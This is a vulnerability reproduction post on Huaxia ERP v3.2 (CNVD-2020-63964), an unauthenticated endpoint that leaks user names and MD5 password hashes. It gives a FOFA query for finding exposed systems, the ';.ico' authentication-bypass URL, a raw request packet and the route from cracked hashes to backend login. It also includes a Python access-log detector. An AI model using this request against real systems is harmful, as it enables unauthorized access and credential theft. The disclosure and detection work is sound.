Huaxia ERP has leaked user name and password sensitive vulnerabilities (CNVD-2020-63964)


Disclaimer: Do not use the techniques described in this article for unauthorized testing. Any direct or indirect consequences or losses arising from the dissemination or use of the information or tools provided here are borne by the user alone; the author bears no responsibility for them. This article is for educational purposes only.

1. Introduction to Huaxia ERP

This article was first published on the Nanfeng Vulnerability Reproduction Library WeChat official account.

Built on the SpringBoot framework and a SaaS model, Huaxia ERP aims to provide open-source, easy-to-use ERP software for small and medium-sized enterprises. It currently focuses on invoicing and financial functions.

2. Vulnerability description

The Huaxia ERP system contains a sensitive information disclosure vulnerability: an unauthenticated request to the user-list interface returns user names and MD5 password hashes, which an attacker can use to obtain access to the system.

CVE number:
CNNVD number:
CNVD number: CNVD-2020-63964

3. Affected versions

Huaxia ERP v3.2

4. FOFA query statement

"jshERP-boot"

5. Vulnerability reproduction

Vulnerability URL: http://127.0.0.1/jshERP-boot/user/getAllList;.ico
Request packet:

GET /jshERP-boot/user/getAllList HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive

The response lists every user together with their password field. The passwords are stored as MD5 hashes; once a hash is reversed, the recovered credentials can be used to log in to the management backend.
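To spot this endpoint being hit in web server access logs, here is an added detection example (not part of the original post or of the jshERP project). The log lines are constructed, and the path check normalizes the `;.ico` style suffix shown above so that the comparison behaves like the servlet container's router rather than a plain string match.

```python
import re
from typing import Dict, List
from urllib.parse import unquote, urlsplit

# Endpoint from the advisory: it returns every user record, password hashes included.
SENSITIVE_ENDPOINT = "/jshERP-boot/user/getAllList"

# Constructed sample access log lines (Common Log Format); not from a real system.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2023:10:00:01 +0000] "GET /jshERP-boot/user/getAllList HTTP/1.1" 200 4821
10.0.0.5 - - [01/Jan/2023:10:00:02 +0000] "GET /jshERP-boot/user/getAllList;.ico HTTP/1.1" 200 4821
10.0.0.9 - - [01/Jan/2023:10:00:03 +0000] "GET /jshERP-boot/user/login HTTP/1.1" 200 120
10.0.0.7 - - [01/Jan/2023:10:00:04 +0000] "GET /jshERP-boot/user/getAllList?page=1 HTTP/1.1" 403 45
"""

# client, identity, user, [time], "method target version", status, bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

def normalize_path(target: str) -> str:
    """Reduce a request target to the path the application will actually route.

    Servlet containers drop ';param' matrix segments, so '/getAllList;.ico'
    is routed to '/getAllList'. A filter that compares the raw string misses
    that; a detector has to normalize the same way before matching.
    """
    path = unquote(urlsplit(target).path)            # drop query/fragment, decode %xx
    path = "/".join(seg.split(";", 1)[0] for seg in path.split("/"))
    return re.sub(r"/+", "/", path)                  # collapse duplicate slashes

def scan_access_log(log_text: str) -> List[Dict]:
    """Return one finding per request that routes to the sensitive endpoint."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or normalize_path(m["target"]) != SENSITIVE_ENDPOINT:
            continue
        findings.append({
            "ip": m["ip"],
            "raw_target": m["target"],
            "status": int(m["status"]),
            # A 200 means the user list (with MD5 hashes) actually left the server.
            "disclosed": m["status"] == "200",
        })
    return findings

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f)
```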

6. POC & EXP

Follow the Nanfeng Vulnerability Reproduction Library official account and reply "Vulnerability Reproduction 36" to get the download address of the POC tool:


7. Remediation advice

The vendor has not yet published a fix; watch the vendor's project page for updates: https://gitee.com/jishenghua/JSH_ERP


Source: blog.csdn.net/nnn2188185/article/details/131255194